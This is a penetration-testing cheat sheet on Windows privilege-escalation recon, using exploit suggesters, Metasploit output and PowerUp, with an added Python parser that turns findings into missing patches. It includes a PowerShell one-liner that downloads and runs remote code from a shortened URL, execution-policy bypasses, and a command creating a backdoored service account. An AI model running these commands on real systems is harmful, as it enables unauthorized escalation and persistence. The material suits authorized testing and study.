Automated Recon

Binaries Information

https://lolbas-project.github.io/#
python3 gtfo -e Certutil.exe

Local Exploit Suggester

# You can feed the output of `systeminfo` to windows-exploit-suggester
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2019-02-19-mssb.xls --systeminfo /home/xxx/Documents/Galactic/systeminfo.txt

# Metasploit also has a module
msf5 > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 29 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
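An added triage helper (not part of this page or of Metasploit) for the suggester output above: it keeps only the `[+]` result lines, separates confirmed "appears to be vulnerable" hits from the inconclusive "could not be validated" ones, and maps each `msYY_NNN`-named module to its Microsoft bulletin ID so the missing patches can be handed to patch management. The sample text is the session output shown above, embedded as a constant.

```python
import re
from typing import List, NamedTuple

# Constructed sample: the local_exploit_suggester output shown on this page.
SAMPLE_OUTPUT = """\
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 29 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
"""

# Only "[+]" lines carry a result; "[*]" lines are progress messages.
LINE_RE = re.compile(r"^\[\+\] (?P<host>\S+) - (?P<module>exploit/\S+): (?P<verdict>.+)$")
# Module names such as ms14_058_track_popup_menu encode the bulletin MS14-058.
BULLETIN_RE = re.compile(r"/ms(?P<yy>\d{2})_(?P<num>\d{3})_")


class Finding(NamedTuple):
    host: str
    module: str
    confirmed: bool   # True only for "The target appears to be vulnerable."
    bulletin: str     # e.g. "MS14-058"; empty when the module name has no bulletin


def parse_suggester(text: str) -> List[Finding]:
    """Turn raw local_exploit_suggester output into structured findings."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        module = m.group("module")
        b = BULLETIN_RE.search(module)
        bulletin = f"MS{b.group('yy')}-{b.group('num')}" if b else ""
        confirmed = "appears to be vulnerable" in m.group("verdict")
        findings.append(Finding(m.group("host"), module, confirmed, bulletin))
    return findings


def missing_bulletins(findings: List[Finding], confirmed_only: bool = True) -> List[str]:
    """Sorted, de-duplicated bulletins the host is reported to lack.

    With confirmed_only=False the inconclusive checks are included as well,
    which is the safer list to hand to patch management."""
    return sorted({f.bulletin for f in findings
                   if f.bulletin and (f.confirmed or not confirmed_only)})
```

Modules without a bulletin in their name (here `ppr_flatten_rec`) still appear in the findings list but contribute nothing to the bulletin summary, so review them separately.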

PowerSploit / PowerUp

# Copy PowerUp.ps1 to the target, then start PowerShell with the execution policy bypassed
powershell -exec bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# You can also use SharpUp.exe
# It needs to be compiled, but it is the newer tool.
msf shell> powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
C:> powershell.exe -nop -exec bypass
PS C:\> Import-Module PowerUp.ps1
PS C:\> Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

# Full in memory
C:\> powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/1mK64oH'); Invoke-AllChecks"
# If a service binary seems to be exploitable, you can back up the real service binary and create a backdoored one
PS C:\> Write-ServiceEXE -ServiceName CustomSVC -UserName backdoor -Password password123 -Verbose

# Restore the real service
PS C:\> Restore-ServiceEXE -ServiceName CustomSVC